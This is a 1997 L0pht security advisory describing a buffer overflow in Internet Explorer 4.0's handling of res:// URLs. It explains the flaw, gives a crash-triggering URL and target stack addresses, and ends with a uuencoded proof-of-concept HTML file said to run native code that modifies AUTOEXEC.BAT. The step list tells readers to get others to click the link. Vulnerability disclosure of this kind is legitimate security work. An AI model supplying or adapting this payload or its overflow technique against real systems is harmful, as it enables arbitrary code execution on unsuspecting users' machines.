-------------------------------------------------------------------------------
========
Scenario
========
The Microsoft Internet Explorer 4.0 Suite, including all programs supplied
with it that read and/or process HTML from either local machines, intranet
machines, or remote internet machines are subject to a buffer overflow in the
HTML decoding process. The buffer overflow can cause the application to page
fault, or in the worst case, execute arbitrary precompiled native code.
=======
Example
=======
1. Copy the supplied HTML file(s) into a location that is accessible via the
target application.
2. Point to it. Look at it.
3. Click on the link. (or let someone click it for you)
4. Become aware of what happens to your machine.
5. Freak out and beg Microsoft to make the bad man stop.
=================
Technical Details
=================
The problem here lies in the deciphering of the URL line format itself. The
base HTML library that is used by the Internet Explorer 4.0 Suite and the
following programs are vulnerable:
- Outlook Express (both mail and news)
- Windows Explorer
- Internet Explorer (different than regular explorer, really)
This problem, because it stems from a programming flaw in the HTML decoding
system, is unaffected by the Explorer "Security Zones" feature. In other
words, if you turn on the highest security level for the zone from where the
exploit HTML is being viewed, you are still vulnerable.
The critical problem here is a buffer overflow in the parsing of a particular
new type of URL protocol. The "res://" type of URL is meant to allow access
to a local resource embedded in a local DLL file. This is useful for
archiving entire websites into a DLL and is not, in its truest concept, a
security flaw.
For example, to read something out of the IE4.0 Tour (stored in a DLL) try
the following URL: res://ie4tour.dll/page1-6.htm
The buffer overflow is on the actual filename specified. To crash your
machine go ahead and try res://blahblahblah ... blahblah/ in your Internet
Explorer window where the amount of 'blah' equals 265 characters.
The function that goes through the filename and validates it is flawed on
Windows 95. Without checking the length, the filename is uppercased,
concatenated with '.DLL' if it isn't there already, and in the process,
copied into a fixed size buffer.
========
Solution
========
Currently, there is no solution available for this flaw. You can't set any
Internet Explorer options to avoid it, and you are not protected by any
level of zone security. Simply don't surf the web, read email or view
net news using Internet Explorer 4.0 until Microsoft puts up a hotfix.
============
Exploit Code
============
Here we go...
When constructing the exploit we want to try something useful.
Lets's start with appending text of your choice to AUTOEXEC.BAT...
(note that running native code lets you do pretty much anything you want)
Note that the location of the exploit string in the stack is very important
and it varies from target application to target application.
Constructing the exploit string:
Figure out stack location for exploit code...
App Loc
Internet Explorer 0x0057C144
Windows Explorer 0x0088A0F4
...
Yeah, I know that those locations have null bytes in them and you can't
put those (or lowercase letters, or CR/LF or 0x07 or anything like that)
in the exploit string... but we'll let microsoft fix that for us. Step thru
the process to see IE add that extra null character for you. Will they
ever cease to amaze...
Put together what you wanna do, tack on the necessary jump addresses and
all that. That's it.
And now, UUENCODED to preserve freshness:
*************************************************************************
* MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER, _NOT_ *
* REGULAR OL' WINDOWS EXPLORER. (put it on a website and download it or *
* click on the IE desktop icon (run iexplore.exe) and type in the name *
* of the file into the URL line) IT WON'T WORK OTHERWISE!!!! *
* (though it could be made to do so) *
*************************************************************************
----====/ SNIP
section 1 of uuencode 5.20 of file infect.htm by R.E.M.
begin 644 infect.htm
M/&AT;6P^#0H\:&5A9#X-"CQT:71L93X-"DEN=&5R;F5T($5X<&QO:71E<@T*
M/"]T:71L93X-"CPO:&5A9#X-"CQB;V1Y(&)G8V]L;W(](T9&1D9&1B!T97AT
M/2,P,#`P,#`^#0H-"CQC96YT97(^#0H\:#$^5VAA="!D;R!)('=A;G0@=&\@
M:6YF96-T('1O9&%Y/SPO:#$^#0H-"D-L:6-K(&AE<F4@=&\@;6]D:69Y(&%U
M=&]E>&5C+F)A=#QP/@T*#0H\82!H<F5F/2(-"G)E<SHO+[C$0=B`+8"`@("0
MD)"0D)"+V#/)@,&J`]FQ7XH3@.)_B!-#XO:0D)"0D%"0D&H"D)"0NNW"6`&!
MZ@$!`0&04KNW\O>_@.^`_]-:6E"0D#/;LP)3@^L$4U"[X(#YO__3@^P,D%A0
M,]NS.5.[#-+G$('K$!"0$%-0N[#*^;__TX/$#)"0D)"[SX#YO__3D)"0N["O
M^+__TY"0D,S,+2TM+2TM+2TM+2TM+4,Z7$%55$]%6$5#+D)!5("-BD5#2$\@
M34E#4D\D3T94(#!73EH@64]5+BXN(%)%4$5.5"!!3D0@0D4@4T%6140AC8I0
M055318V*@"TM+2TM+2TM+2TM+2TM+2U!04%!0D)"0D,!(+Z_1$1$143!5R\-
M"B(^#0H\9F]N="!F86-E/2)7:6YG9&EN9W,B('-I>F4]*S8^_SPO9F]N=#X\
M9F]N="!S:7IE/2LV/CT\+V9O;G0^/&9O;G0@9F%C93TB5VEN9V1I;F=S(B!S
M:7IE/2LV/B9G=#PO9F]N=#X-"CPO83X-"@T*/"]C96YT97(^#0H-"CPO8F]D
->3X-"CPO:'1M;#X-"CX-
`
end
sum -r/size 62455/917 section (from "begin" to "end")
sum -r/size 5779/643 entire input file
/====---- SNIP
A haiku:
Microsoft IE
Is there no security?
Not if you ask me.
dildog@l0pht.com (11/1/97)
-------------------------------------------------------------------------------
For more L0pht (that's L - zero - P - H - T) advisories check out:
http://l0pht.com/advisories.html